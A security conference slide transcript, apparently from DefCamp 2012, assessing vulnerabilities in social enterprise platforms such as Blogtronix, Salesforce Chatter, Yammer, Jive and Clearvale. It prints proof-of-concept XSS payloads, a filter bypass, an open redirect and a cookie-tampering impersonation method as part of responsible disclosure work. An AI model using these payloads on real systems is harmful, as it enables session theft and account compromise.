Your SlideShare is downloading. ×
Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Social Enterprise Rises! …and so are the Risks - DefCamp 2012

420
views

Published on


0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
420
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
4
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Social Enterprise Software Rises!…and so are the RisksMarian Ventuneacmarian.ventuneac@gmail.com@mventuneac
  • 2. About myself Security Architect International presenter Member of OWASP and ISACA global organizations OWASP Ireland Limerick Chapter Leader https://www.owasp.org/index.php/Ireland-Limerick Security Researcher PhD, MEng http://www.ventuneac.net http://secureappdev.blogspot.com http://dcsl.ul.ie2 An Introduction to Web Application Security Risks
  • 3. Agenda Social Enterprise Software: What, Why, and How? Social Enterprise Software & Risks Thoughts on Calculated Risk Social Enterprise Software & Risks (some case studies) Final Thoughts3 An Introduction to Web Application Security Risks
  • 4. Social Enterprise Software: What? Social Enterprise/Social Enterprise Networks/Social Enterprise Software Enterprise solutions providing Facebook-like social networking functionality ‘social networking’ + ‘enterprise software’ = ‘social enterprise networking’4 An Introduction to Web Application Security Risks
  • 5. Social Enterprise Software: Why? Improve communication an increase work efficiency  internal collaboration  establish teams, communities or informal groups  share knowledge and learn from other people experiences  social networking  external collaboration with partners … Used by employees and external customers, suppliers, partners5 An Introduction to Web Application Security Risks
  • 6. Social Enterprise Software: Deployment models On-premise solutions  Deployed inside the enterprise network, usually controlled and managed by the client Public Cloud-based solutions  Software as a Service (SaaS) - Hosted and administered by the vendor Hybrid deployments Usually open to allow external collaboration  customers, suppliers, third-party contractors, etc6 An Introduction to Web Application Security Risks
  • 7. Social Enterprise Software: Some of the Risks Potential loss of enterprise data  Understand what type of data needs to be uploaded there  Do you know/control what data is actually being shared? Exploitation of common application vulnerabilities Phishing attacks, social engineering Viruses and malware Cloud-based solutions – various compliance and security concerns  Do you know where is your data stored?7 An Introduction to Web Application Security Risks
  • 8. Common Strategies for Risk Mitigation Vendor/supplier due diligence Security policies (generic/dedicated) Security processes & procedures  Control the data being shared (data classification)  Verify identity of users accessing the data (authentication)  Control user access to data  Approve/Create/Lock user accounts (accounts management)  Remote wipe (for mobile devices – smartphone, tablets, etc) …8 An Introduction to Web Application Security Risks
  • 9. Calculated Risks9 An Introduction to Web Application Security Risks
  • 10. Calculated Risks (cont) Business requirement: WE (the company) need social enterprise software X for Y and Z reasons. IT Security (most likely take on it):  Scenario 1: No, there is to much risk to take!  Scenario 2: Yes - We trust our partners and their choices.  Scenario 3: Yes - IF Business ASSUMES ALL THE RISKS…  Scenario 4: Let’s take a closer look at it…  Scenario 5: Yes - the vendor is big enough and we can trust it (= the vendor takes application security seriously)10 An Introduction to Web Application Security Risks
  • 11. Let’s Take a Closer Look Software defects leading to exploitation of security vulnerabilities  OWASP Top 10 Security Risks  CVE/SANS Top 25 Programming Errors Vendor size – a plus, but doesn‘t guarantee the chosen solution is vulnerability free It is safe to assume there is no application 100% secure If anyone claims such a thing, can they provide reasonable proof? An Introduction to Web Application Security Risks
  • 12. Let’s Take a Closer Look (cont) Trust but verify  Reach an agreement to test the chosen solution in a suitable environment (ideally prior of any contracts being signed)  Manual security testing  Automated security testing  Responsible disclosure Most likely you will not be disappointed  An Introduction to Web Application Security Risks
  • 13. The Closer Look (cont) A practical take on assessing security of social enterprise software solutions Some of the chosen ones An Introduction to Web Application Security Risks
  • 14. The Closer Look (cont) Assessment criteria including tests for  Cross-Site Scripting (XSS)  Insecure Direct Object Reference  Security Missconfiguration  Failure to Restrict URL Access  Unvalidated Redirects and Forwards  Logical Flaws … An Introduction to Web Application Security Risks
  • 15. Blogtronix Enterprise Blogtronix Enterprise v4.0.4179 (on-premise) and SaaS CVE-2011-1039 - Multiple XSS Vulnerabilities  Persistent (partially) XSS via Search functionality (auth. user) HTTP request: http://test_site/Home/pages/search/?search= <script>alert(document.cookie)</script> &sub=1&tab=0 HTTP response: … <a href="/Home/pages/search/?search=%3cscript %3ealert(document.cookie)%3b&amp;sub=1 &amp;tab=0"> <script>alert(docume...</a> </span> <span style=“ … An Introduction to Web Application Security Risks
  • 16. Blogtronix Enterprise (cont) CVE-2011-1039 - Multiple XSS Vulnerabilities  Reflected XSS in login page via arbitrary parameter HTTP request: https://test_site/pages/login/?a"> <script>alert(document.cookie)</script> HTTP response: <form method="post" action="/pages/login/? a"><script>alert(document.cookie)</script>" id="aspnetForm">  Multiple Reflected XSS via existing and arbitrary parameters of existing resources An Introduction to Web Application Security Risks
  • 17. Blogtronix Enterprise (cont) Insecure Direct Object Reference (variant)  Valid user A can potentially impersonate another user B  Tamper value of userAccountID_http://test_site/ cookie (ASP.NET GUID)1. At login time - replace value of userAccountID_ cookie with the one matching user B 2. Do something noticeable (post a message in group X) & log out 3. As authenticated user A, review user recent B’s activity – user B appears as a recent visitor of group X An Introduction to Web Application Security Risks
  • 18. Blogtronix Enterprise (cont) Security Missconfiguration Enumerate valid user IDs  Unauthenticated attacker checks for https://test_site/users/user_id  if user_id exists, redirected to login  if not, display custom error Enumerate valid groups  Unauthenticated attacker checks for https://test_site/group_id/pages/people/  if group_id exists, redirected to login  if not, display custom error An Introduction to Web Application Security Risks
  • 19. Blogtronix Enterprise (cont) Improper Error Handling An Introduction to Web Application Security Risks
  • 20. Blogtronix Enterprise (cont) CVE-2011-1040 Unvalidated Redirects https://test_site/pages/login/?ReturnUrl=http%3a%2f%2fwww.google.co.uk%2f  Once the user logs in, he/she gets redirected to the resource previously stated via ReturnUrl parameter CVE-2011-1041 Failure to restrict access to protected resources  Attacker knows hashed user ID and name of uploaded file => file can be accessed without auth.  Attacker knows hashed user ID => user profile picture can be accessed without auth. An Introduction to Web Application Security Risks
  • 21. Salesforce Chatter SaaS Multiple persistent XSS vulnerabilities  via user profile first & last name <a href="/005D00000022Ouw" class= "entityLink" title="Adam" onmouseover="alert(1)" Cole"> Adam&quot; onmouseover=&quot;alert(1)& quot; Cole</a>  via group name <a href="/0F9D0000000PPwz" class= "entityLink" title="test_group" onmouseover="alert(3)"">test_group& quot; onmouseover=&quot;alert(3)&quot;</a> An Introduction to Web Application Security Risks
  • 22. Salesforce Chatter SaaS (cont) Improper User Input Validation  File Sharing - CR LF symbols accepted into file title (via SaaS solution) POST /mobile/direct/23.0/ 005D0000001yD7B/feed_items.json HTTP/1.1 Host: eu1.salesforce.com … Content-Disposition: form-data; name="title” arv_test52%0a%0d%0a An Introduction to Web Application Security Risks
  • 23. Salesforce Chatter Desktop Improper Error Handling leading to Information Disclosure  submitting comments for inexistent posts HTTP POST request: /mobile/direct/23.0/0D5D00000000000/comments.json HTTP/1.1 Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: nORA-06512: at "DOPEY.CFEEDCOMMENT", line 149nORA-06512: at "DOPEY.CFEEDCOMMENT", line 253nORA-06512: at line 1n: {call cFeedComment.insert_feedcomments(?,?,?,?,?,?,?,?,?,?,?,?,?)})}"}  attempting to ‘like’ and inexistent post HTTP POST request: /mobile/direct/23.0/0D5D00000000000/like.json HTTP/1.1 Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: nORA-06512: at "DOPEY.CFEEDLIKE", line 156nORA-06512: at "DOPEY.CFEEDLIKE", line 217nORA-06512: at "DOPEY.CFEEDLIKE", line 118nORA-06512: at line 1n: {call cFeedLike.insert_detail(?,?,?,?,?,?,?,?)})}"} An Introduction to Web Application Security Risks
  • 24. Yammer Persistent XSS via group nameHTTP POST request:/ventuneac.net/groups HTTP/1.1Host: www.yammer.com…-----------------------------295562556131627Content-Disposition: form-data; name="group[name]"a4" onmouseover="alert(4)"-----------------------------295562556131627HTTP response (home page):GET /ventuneac.net/ HTTP/1.1Host: www.yammer.com…<a href="/ventuneac.net/groups/a4onmouseoveralert4"class="nav-list-link" title="a4" onmouseover="alert(4)" group"> An Introduction to Web Application Security Risks
  • 25. Jive Persistent XSS via group name (create/edit)HTTP POST request:POST /create-group.jspa HTTP/1.1Host: ventuneac.jiveon.com…-----------------------------215202979014924Content-Disposition: form-data; name="description"group2"><script>alert(1)</script>-----------------------------215202979014924HTTP response (load group from Places):GET /groups/group2 HTTP/1.1Host: ventuneac.jiveon.com…<meta name="description" content="group2"><script>alert(1)</script>" /> An Introduction to Web Application Security Risks
  • 26. BroadVision Clearvale SaaS Multiple persistent XSS vulnerabilities  via user profile first & last name & search page <a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style="xss:expr/*XSS*/ession( document.location(http://www.google.co.uk))"> m&quot; style=&quot;xss:expr/*XS...</a>  via group name & search page <a href="http://vmarian.clearvale.com/pg/groups/ 23/aaaa-stylexssexprxssessiondocumentlocation httpwwwgooglecouk/" title="aaa"> <a style="xss:expr/*XSS*/ession( document.location(http://www.google.co.uk))"> aaa&quot;&gt;&lt;a style=&quot;xss:exp...</a> An Introduction to Web Application Security Risks
  • 27. BroadVision Clearvale SaaS (cont) The broken fix for user profile name XSS issue  Black-list user input validation style followed by = becomes style00 (style=, style =, etc) document.location followed by ( becomes document.location00 alert followed by ( becomes 00 /* becomes /0* for first instance only */ becomes *0/ …  Improper output escaping An Introduction to Web Application Security Risks
  • 28. BroadVision Clearvale SaaS (cont) The broken fix for user profile name XSS issue  Bypassing Clearvale XSS filter XSS payload: firstname: m” style lastname: ="/**/;xss:expr/**/ession(alert/**/(aaa)) HTTP response: … <a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style ="/0**0/;xss:expr/**/ession(alert/**/(aaa)) ">m&quot; style =&quot;/0**0/;xss:...</a> An Introduction to Web Application Security Risks
  • 29. Knowing What ‘private’ Really Means Social Enterprise Software usually provides document sharing/publishing functionality  Private (not shared with anyone – default option)  Shared with private (locked) groups/members  Shared with public groups  Shared with everyone (shared via public link) In certain conditions, the private documents can become… less private  An Introduction to Web Application Security Risks
  • 30. AntiVirus & anti-malware file scanningBroadVision Clearvale has a built-in AV scanning engineThe rest of tested solutions currently lack such capabilitiesYammer and Salesforce plan to add AV file scanningNo malicious files were used for testing AV capabilities An Introduction to Web Application Security Risks
  • 31. The Closer Look: SummaryCommon security vulnerabilities - can be easily exploitedUser shared information is not properly validated and sanitised  A malicious user can inject JavaScript malware into his/her profile/groups/actions/etc  Where such user controlled data is seen/accessed by other users, their accounts can easily get compromisedExploitation of such vulnerabilities could severely compromise security of enterprise data An Introduction to Web Application Security Risks
  • 32. Final ThoughtsEven if the vendor is a market leader, it doesn’t necessarily mean they get application security rightDare to ask for proofs of application security Trust but verifyVendor due diligence, social enterprise software related security policies & security procedures, etcInterested on this kind of benchmarks? OWASP Security Baseline Project https://www.owasp.org/index.php/OWASP_Security_Baseline_Project An Introduction to Web Application Security Risks
  • 33. Thank Youmarian.ventuneac@gmail.com@mventuneac